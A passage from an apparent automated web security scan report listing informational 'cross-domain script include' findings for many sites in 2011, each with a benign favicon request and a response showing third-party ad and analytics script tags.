Set-Cookie: bizj=YToxOntzOjM6IlVJTiI7czozMDoiMjkxNTE2MTg0MzRkOTcyNmY4ZDBiNThjNWNlMGIzIjt9%7C1301751544%7Cb769a95f8358eec5ae178a6877548f04d46f0bba7d768b809293bbbf75c88a93; expires=Sun, 01-Apr-2012 13:39:04 GMT; path=/; domain=.bizjournals.com
ServerID: 3
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 45605

<!DOCTYPE html>
<!-- tid: 105; lct: Wed Mar 23 15:40:16 2011 -->
<!--[if IE ]><![endif]-->
<html>
<head><title>The page you requested was not found | The Business Journals</title>
<base href="http://w
...[SNIP]...
</script>
<script src="http://api.bizographics.com/v1/profile.json?callback=load_ad&api_key=4db4d30f3e4d4a7caa0d94f4d1bb1dee" type="text/javascript"></script>
...[SNIP]...
<!-- Begin DFP Block -->
<script type="text/javascript" src="http://ad.doubleclick.net/adj/bzj.bizjournals/;dcopt=ist;tile=6;pos=wel;kw=bizjournals;sz=1x1;ord=1301751544.8146.3.17464?" target="_blank"></script>
...[SNIP]...
<!-- Begin DFP Block -->
<script type="text/javascript" src="http://ad.doubleclick.net/adj/bzj.bizjournals/;kw=bizjournals;pos=pub;am=0;sz=120x60;ord=1301751544.8146.3.17464?" target="_blank"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://tcr.tynt.com/javascripts/Tracer.js?user=ddElwcoZ0r37YtadbiUzgI&amp;amp;s=151&amp;amp;su=0&amp;amp;st=1&amp;amp;lang=en"></script>
<script type="text/javascript" src="http://js.bizographics.com/convert_data.js?partner_id=447"></script>
<script type="text/javascript" src="http://ps1.inflectionpointmedia.com/track?t=url-track&amp;pid=ACBJ"></script>
...[SNIP]...
20.10. http://www.blogs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blogs.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blogs.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 14:07:11 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <meta http-
...[SNIP]...
<div id="leaderboard-250"><script src="http://ads.sixapart.com/custom?id=6a.blogscom/soc.all.ros/other/225x90&js=1"></script>
...[SNIP]...
<div id="leaderboard-728"><script src="http://ads.sixapart.com/custom?id=6a.blogscom/soc.all.ros/other/728x90&js=1"></script>
...[SNIP]...
<div id="sidebar-300"><script src="http://ads.sixapart.com/custom?id=6a.blogscom/soc.all.ros/other/300x250&js=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://profile.typepad.com/services/embed/tpc/6a01053611bc14970c010536098bcd970b/counts_embed.js"></script>


<script src="http://cdn.media6degrees.com/static/sa1103.js" type="text/javascript"></script>
...[SNIP]...
20.11. http://www.bullishbankers.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bullishbankers.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bullishbankers.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:06:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.15
Set-Cookie: PHPSESSID=a70ecd980c5c9f83309c1b6e14b4625a; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: mtaShowAfter=deleted; expires=Fri, 02-Apr-2010 14:06:41 GMT; path=/
Set-Cookie: mtaVisits=1; expires=Sun, 01-Apr-2012 14:06:42 GMT; path=/
X-Pingback: http://www.bullishbankers.com/xmlrpc.php
Last-Modified: Sat, 02 Apr 2011 14:06:42 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">


<head profile="ht
...[SNIP]...
<link rel="stylesheet" href="http://www.bullishbankers.com/wp-content/plugins/sociable/sociable.css" type="text/css" media="screen" charset="utf-8"/>
                       <script type='text/javascript' src='http://plugins.wikinvest.com/plugin/javascript/relatedContent/scripts.php'></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://www.statcounter.com/counter/counter_xhtml.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://analytics.aweber.com/js/awt_analytics.js?id=7PLa"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
20.12. http://www.canon.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.canon.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.canon.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:59:10 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 8501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" >
<head>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=canonglobal"></script>
...[SNIP]...
20.13. http://www.citibank.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citibank.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.citibank.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not found
Server: ""
Date: Sat, 02 Apr 2011 13:35:26 GMT
Content-type: text/html
Connection: close
Content-Length: 14811

<HTML>
<HEAD>
   <style>
   <!--
       body {
           background: #fff;
       }
       .notextdecor{
           COLOR: #000099;
           TEXT-DECORATION: none;
       }
       TD{
           COLOR: #000000;
           FONT-FAMILY: verdana, arial, helvetica, sans
...[SNIP]...
</script>
   <script type="text/javascript" language="javascript" src="http://www.citi.com/domain/scripts/country.js"></script>
   <script type="text/javascript" language="javascript" src="http://www.citi.com/domain/scripts/config.js"></script>
...[SNIP]...
20.14. http://www.collegehumor.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.collegehumor.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegehumor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:35:37 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: returning_user=deleted; expires=Fri, 02-Apr-2010 13:35:36 GMT; path=/; domain=.collegehumor.com
Set-Cookie: returning_user=1; expires=Mon, 02-May-2011 13:35:37 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=deleted; expires=Fri, 02-Apr-2010 13:35:36 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=2aaaf6d3dd05b89fe9a91fb542a542bf37833c97; expires=Fri, 01-Apr-2016 18:39:27 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=2aaaf6d3dd05b89fe9a91fb542a542bf37833c97; expires=Fri, 01-Apr-2016 18:39:27 GMT; path=/; domain=.collegehumor.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- re-targeting tracking -->
<script type="text/javascript" defer="defer" src="http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/alice.js?pc=3439/3658"></script>
...[SNIP]...
20.15. http://www.curse.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.curse.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.curse.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Set-Cookie: BIGipServer=1949253700.20480.0000; path=/
Cache-Control: no-cache,private
Content-Length: 23341
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
CommunityServer: 4.0.30619.63
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:39:41 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
20.16. http://www.dealer.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dealer.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dealer.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 19895
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 14:16:53 GMT
Connection: close
Set-Cookie: exp_last_visit=986393813; expires=Sun, 01-Apr-2012 14:16:53 GMT; path=/
Set-Cookie: exp_last_activity=1301753813; expires=Sun, 01-Apr-2012 14:16:53 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<![endif]-->
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.mkt51.net/lp/static/js/iMAWebCookie.js?7e29f616-12c999824aa-c6f842ded9e6d11c5ffebd715e129037&h=www.pages05.net"></script>
...[SNIP]...
20.17. http://www.dexknows.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dexknows.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dexknows.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: private, max-age=31536000
Date: Sat, 02 Apr 2011 13:45:32 GMT
Content-Length: 24377
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

...[SNIP]...
</script>

<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">

</script>
...[SNIP]...
20.18. http://www.ebayclassifieds.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebayclassifieds.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ebayclassifieds.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private=Set-Cookie
Set-Cookie: p=""; Domain=ebayclassifieds.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Sat, 02 Apr 2011 13:39:11 GMT
Content-Length: 20374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>favicon ico | favicon ico on eBay Classifieds</title>
<meta http-e
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://polaris.classistatic.com/static/1103291517/js/polaris.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</li>
           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=polaris2009"></script>
...[SNIP]...
<!-- footer -->
<script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
...[SNIP]...
<!-- /id="ui-body" -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://polaris.classistatic.com/static/1103291517/js/headerGreeting.js"></script>
<script type="text/javascript" language="JavaScript" src="http://polaris.classistatic.com/static/1103291517/js/jquery.core.js"></script>
<script type="text/javascript" language="JavaScript" src="http://polaris.classistatic.com/static/1103291517/js/jquery.jstore-all.js"></script>
<script type="text/javascript" language="JavaScript" src="http://polaris.classistatic.com/static/1103291517/js/ui/jquery.ui.core.js"></script>
<script type="text/javascript" language="JavaScript" src="http://polaris.classistatic.com/static/1103291517/js/ui/jquery.ui.position.js"></script>
<script type="text/javascript" language="JavaScript" src="http://polaris.classistatic.com/static/1103291517/js/ui/jquery.ui.widget.js"></script>
<script type="text/javascript" language="JavaScript" src="http://polaris.classistatic.com/static/1103291517/js/ui/jquery.ui.autocomplete.js"></script>
<script type="text/javascript" language="JavaScript" src="http://polaris.classistatic.com/static/1103291517/js/geo.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://tcr.tynt.com/javascripts/Tracer.js?user=dTUSEadYur3Oy6acn9QLxW&amp;s=41"></script>
...[SNIP]...
20.19. http://www.elyricsworld.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elyricsworld.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elyricsworld.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 20:22:02 GMT
Server: Apache/2.2.17 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 1321
Content-Type: text/html

<html>
   <head>
       <title>/favicon.ico not found on elyricsworld.com</title>
       <meta name="robots" content="noindex">
<style type="text/css">
body
{
   font-size: 12px;
   color: #000000;
   font-f
...[SNIP]...
</script>
<script type="text/javascript"
src="http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js"></script>
...[SNIP]...
20.20. http://www.freeridegames.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freeridegames.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freeridegames.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:08 GMT
Server: Apache
Set-Cookie: JSESSIONID=454706C5579DD4BBE9DEF3994E49D6C7; Path=/
Set-Cookie: 143_userName=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: 143_password=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: 143_TURNKEY=Default-551301751188525286; Expires=Sun, 01-Apr-2012 13:33:08 GMT; Path=/
Set-Cookie: 143_CAMPAIGN_SERIAL_ID=Default-Default; Expires=Fri, 01-Jul-2011 13:33:08 GMT; Path=/
Set-Cookie: 143_FIRST_BROWSER="Default-MSIE 7.0"; Version=1; Max-Age=7776000; Expires=Fri, 01-Jul-2011 13:33:08 GMT; Path=/
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Accept-Ranges: bytes
ETag: W/"60157-1301309068734"
Last-Modified: Mon, 28 Mar 2011 10:44:28 GMT
Content-Length: 60157
Content-Type: text/html

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Games - D
...[SNIP]...
</div>
               <script type="text/javascript" src="http://apps.conduit-banners.com/FreeRideGames-Great_Games?appid=143ada62-5cdf-4856-a621-0bfe11a6e5b1&script=togo&type=1"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- BEGIN TRIGGER TAG -->
   <script language="java_script" type="text/javascript" src="http://cdn.triggertag.gorillanation.com/js/triggertag.js"></script>
...[SNIP]...
20.21. http://www.games.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.games.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.games.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 /http:/o.aolcdn.com/os/games/images/favicon.ico
Date: Sat, 02 Apr 2011 13:31:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Length: 316518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- dpm-lm236 -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...
<!-- Set Merge URL-->
<script type="text/javascript" src="http://o.aolcdn.com/os_merge/?file=/games/scripts/jquery.min.js&amp;file=/games/scripts/default.min.js&amp;file=/aol/jquery.getjs-1.0.min.js&amp;file=/header/js/jquery.globalheader-1.3.js&amp;file=/header/js/jquery.globalsearchbox-1.3.js"></script>
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
<!-- BEGIN: Global Games HeadAppend -->

<script type="text/javascript" src="http://o.aolcdn.com/os/games/scripts/default.min.js"></script>
...[SNIP]...
<!-- BEGIN: FEEDBACK LINK JS -->
<script type="text/javascript" src="http://o.aolcdn.com/feedback/feedback1.js"></script>
...[SNIP]...
<!-- END: Global Games FootAppend --><script src="http://o.aolcdn.com/os_merge/?file=/aol/jquery.sonar.min.js&amp;file=/aol/jquery.facebooksocial.min.js&amp;file=/aol/jquery.inlinecss-1.0.min.js&amp;file=/aol/jquery.openwindow.min.js&amp;file=/aol/jquery.aolshare.min.js&amp;file=/aol/jquery.aolshare.min.js" type="text/javascript"></script>
...[SNIP]...
20.22. http://www.guitarcenter.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guitarcenter.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.guitarcenter.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:14:52 GMT
Server: Microsoft-IIS/6.0
ETag:
SN: 28
X-Powered-By: ASP.NET
Set-Cookie: ASP.NET_SessionId=cfhhpohbyrkjmlcxvhr5mdrd; path=/; HttpOnly
Set-Cookie: ref=; path=/
Set-Cookie: ref_d=4/2/2011 10:14:51 AM; path=/
Set-Cookie: source=; path=/
Set-Cookie: ad_id=; path=/
Set-Cookie: orig_ref=; expires=Sat, 16-Apr-2011 14:14:51 GMT; path=/
Set-Cookie: orig_ref_d=4/2/2011 10:14:51 AM; expires=Sat, 16-Apr-2011 14:14:51 GMT; path=/
Set-Cookie: orig_source=; expires=Sat, 16-Apr-2011 14:14:51 GMT; path=/
Set-Cookie: orig_ad_id=; expires=Sat, 16-Apr-2011 14:14:51 GMT; path=/
Set-Cookie: uid=36efd3e4-9a5c-4120-8cc5-e6a569099115; expires=Mon, 02-May-2011 14:14:51 GMT; path=/
Set-Cookie: IsLoyaltyAvailable=False; expires=Mon, 02-May-2011 14:14:52 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 65425


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__htmHead"><s
...[SNIP]...
<!-- NEW FOR HISTORY BLOCK -->
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js" type="text/javascript"></script>
...[SNIP]...
20.23. http://www.hayneedle.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hayneedle.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hayneedle.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 No Content
Date: Sat, 02 Apr 2011 14:13:19 GMT
Server: Apache
Set-Cookie: SITE_ID=669;domain=.hayneedle.com;path=/
Set-Cookie: GLOBALBRANDTABDISPLAYFLAG=1;domain=.hayneedle.com;expires=Mon, 25-Mar-2041 14:13:19 GMT;path=/
Set-Cookie: CFID=1845783;expires=Mon, 25-Mar-2041 14:13:19 GMT;path=/
Set-Cookie: CFTOKEN=18555418;expires=Mon, 25-Mar-2041 14:13:19 GMT;path=/
Set-Cookie: SID=168F9556%2DAFAA%2DD69D%2DBF662349017993E3;domain=.hayneedle.com;path=/
Set-Cookie: BRAND_SID=168F9564%2DBCFC%2D2008%2DF545EEB98C2F515F;domain=.hayneedle.com;path=/
Set-Cookie: GLOBAL_SID=168F9572%2DFF8F%2D4773%2D011E87EA6323CAED;domain=.hayneedle.com;expires=Mon, 25-Mar-2041 14:13:19 GMT;path=/
Set-Cookie: SITE_ID=669;path=/
Set-Cookie: GEO_DATA=%3CwddxPacket%20version%3D%271%2E0%27%3E%3Cheader%2F%3E%3Cdata%3E%3Cstruct%3E%3Cvar%20name%3D%27POSTAL%5FCODE%27%3E%3Cstring%3E05672%3C%2Fstring%3E%3C%2Fvar%3E%3C%2Fstruct%3E%3C%2Fdata%3E%3C%2FwddxPacket%3E;path=/
Set-Cookie: SURVEYS=309%7C%7Bts%20%272011%2D04%2D02%2009%3A13%3A19%27%7D%7C0%7C0;expires=Mon, 25-Mar-2041 14:13:19 GMT;path=/
Set-Cookie: SESSION_COUNTER=4310204;path=/
Set-Cookie: SIGNATURE=MWP5GCRJ3nTSpdoEL7gF10r6POmFuHsBTEquPge%2BNls2sE5V2f2bPn6ywNvybK6A;domain=.hayneedle.com;path=/
Set-Cookie: GLOBAL_CUSTOMER_ACCOUNT=%3CwddxPacket%20version%3D%271%2E0%27%3E%3Cheader%2F%3E%3Cdata%3E%3Cstruct%3E%3Cvar%20name%3D%27CUSTOMER%5FID%27%3E%3Cstring%3E0%3C%2Fstring%3E%3C%2Fvar%3E%3Cvar%20name%3D%27CUSTOMER%5FFIRST%5FNAME%27%3E%3Cstring%3E%3C%2Fstring%3E%3C%2Fvar%3E%3Cvar%20name%3D%27SIGNED%5FIN%27%3E%3Cstring%3E%3C%2Fstring%3E%3C%2Fvar%3E%3C%2Fstruct%3E%3C%2Fdata%3E%3C%2FwddxPacket%3E;domain=.hayneedle.com;path=/
Set-Cookie: SKU_COMPARE=;domain=.hayneedle.com;expires=Mon, 25-Mar-2041 14:13:19 GMT;path=/
Set-Cookie: INITIAL_SESSION_LOGGED=1;domain=.hayneedle.com;path=/
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 22867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
...[SNIP]...
</div>
   
       <script src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...
20.24. http://www.iloveindia.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iloveindia.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.iloveindia.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:56:57 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.9
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 23719

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<HTML>

<HEAD>
<TITLE>Page not found - iloveindia.com</TITLE>

<LINK HREF="/homestyle.css" TYPE="text/css" REL="STYLESHEET
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_011615198091901542997%3Avgbx0sws0my&lang=en"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_011615198091901542997%3Avgbx0sws0my&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
20.25. http://www.kcom.com/contact-us/brighton  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kcom.com
Path:   /contact-us/brighton

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /contact-us/brighton HTTP/1.1
Host: www.kcom.com
Proxy-Connection: keep-alive
Referer: http://www.kcom.com/contact-us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
